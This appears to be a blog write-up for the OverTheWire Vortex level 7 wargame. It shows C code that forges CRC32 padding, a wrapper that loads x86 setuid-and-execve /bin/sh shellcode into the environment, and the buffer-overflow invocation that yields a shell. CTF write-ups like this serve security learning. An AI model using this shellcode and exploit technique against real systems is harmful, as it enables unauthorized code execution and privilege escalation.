Overthewire Vortex Level7

This level covers a basic buffer overflow, but we have one difficulty to defeat: the crc32 sum of the input should be 0xe1ca95ee. So we must generate our attack vector, which will do the overflow + code injection, and after that, we should pad it, so the crc32 sum will fit the conditions. First to do is to read the paper, and understand it! It is easy to read, but in section “Reversing CRC-32”, the example is wrong (The paper denotes the xor operation with the ‘+’ sign, and in the example section, the author accidentally added the values together instead of xoring them :-)).

My opinion: To really understand how crc is working take a pencil and a sheet of paper, and try to calculate it manually.

Next step is analysing the binary, and extracting the crc tables. For this task I found boomerang decompiler. The generated output is not 100% correct, but it can export the data structures, and you can get an overview what the program does. Analyse and rewrite/correct the generated C code.

After this two steps, the following code will be pretty straightforward:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <ctype.h>

#define B(r,i)	((r >> (i*8)) & 0xFF)
#define C(i,j)	(B(crc32_table[i],j))

int crc32_table[256] = { 0, 0x77073096, [...] 0x2d02ef8d };

unsigned int crc32(unsigned int seed, const char* str, int len) {
	unsigned int i,k;
	for(i=0; i>= 8;
		seed ^= crc32_table[k];
	}
	return seed;
}

void print_str(const char *s, int len) {
	int i;
	for(i=0; i
		if(isalpha(s[i]))
			printf("%c",s[i]);
		else
			printf("\\x%02x", (unsigned char)s[i]);
	}
}

int find_entry(unsigned char top) {
	int i;
	for(i=0; i<256; i++)
		if(C(i,3) == top)
			return i;
	return -1;
}

int main(int argc, char **argv) {
	const char *S = argv[1];
	const unsigned int result = 0xe1ca95ee;
	unsigned int seed = crc32(0,S,strlen(S));

	int x1 = find_entry(B(result,3));
	int x2 = find_entry(B(result,2)^C(x1,2));
	int x3 = find_entry(B(result,1)^C(x1,1)^C(x2,2));
	int x4 = find_entry(B(result,0)^C(x1,0)^C(x2,1)^C(x3,2));

	unsigned int padding =
		((x4 ^ B(seed,0)) << 24) +
		((x3 ^ B(seed,1) ^ C(x4,0)) << 16) +
		((x2 ^ B(seed,2) ^ C(x4,1) ^ C(x3,0)) << 8 ) +
		((x1 ^ B(seed,3) ^ C(x4,2) ^ C(x3,1) ^ C(x2,0)));

	int len = strlen(S);
	char *ptr = malloc(len+4+1);
	strncpy(ptr, S, len);
	ptr[len++] = B(padding,3);
	ptr[len++] = B(padding,2);
	ptr[len++] = B(padding,1);
	ptr[len++] = B(padding,0);
	ptr[len] = '\0';

	print_str(ptr,len);

	free(ptr);

}
  • Macro B returns the ith byte of the given 32bit number
  • Macro C does the same, but on a selected CRC entry
  • Function crc32 generates the standard CRC code, for a given input string.
  • Function print_str prints the padded string taking special care of non alphanumeric characters.
  • Function find_entry can find an entry in the crc table based on its top byte.
  • Using the same method as in the previous levels, we create a wrapper, and put the shellcode into an evironment variable.

    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <string.h>
    
    int main(int argc, char* argv[]) {
        if(argc != 2)
    	return EXIT_FAILURE;
        char* sh =  "\x90\x90 [...] \x90\x90"
            "\xeb\x2b\x5e\x31\xc0\xb0\x46\x31\xdb\x66\xbb\xfe\x01\x31\xc9\x66"
            "\xb9\xfe\x01\xcd\x80\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89"
            "\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x31\xd2\xcd\x80\xe8\xd0\xff"
            "\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\xff\xff\xff";
    
        char* arg[] = {"AXT", argv[1], NULL};
        char* env[] = {sh, NULL};
        execve("/vortex/level7",arg,env);
    }
    

    We have everything set up to do the exploitation. Use the crc padder code on the input string, and pass it to the wrapper. Like that (you must find the exact number of “A”-s 🙂 ):

    ./wrapper `crc_pad "AAA[...]AAA\x01\xff\x7f\xbf"`
    sh-3.2$ cat /etc/vortex_pass/vortex8    
    ********
    

    Fun notes: A few days after I solved this challenge, I’ve found a crc padder code in the

    This entry was posted in Wargame and tagged , , . Bookmark the permalink.

    One Response to Overthewire Vortex Level7

    1. jeherve says:

      Once you’re done with that series, you might wanna have a look at Facebook Hacker cup 🙂
      http://www.facebook.com/hackercup

      And if you wanna practice, they have puzzles: http://www.facebook.com/careers/puzzles.php

    Leave a Reply

    Fill in your details below or click an icon to log in:

    WordPress.com Logo

    You are commenting using your WordPress.com account. Log Out / Change )

    Twitter picture

    You are commenting using your Twitter account. Log Out / Change )

    Facebook photo

    You are commenting using your Facebook account. Log Out / Change )

    Google+ photo

    You are commenting using your Google+ account. Log Out / Change )

    Connecting to %s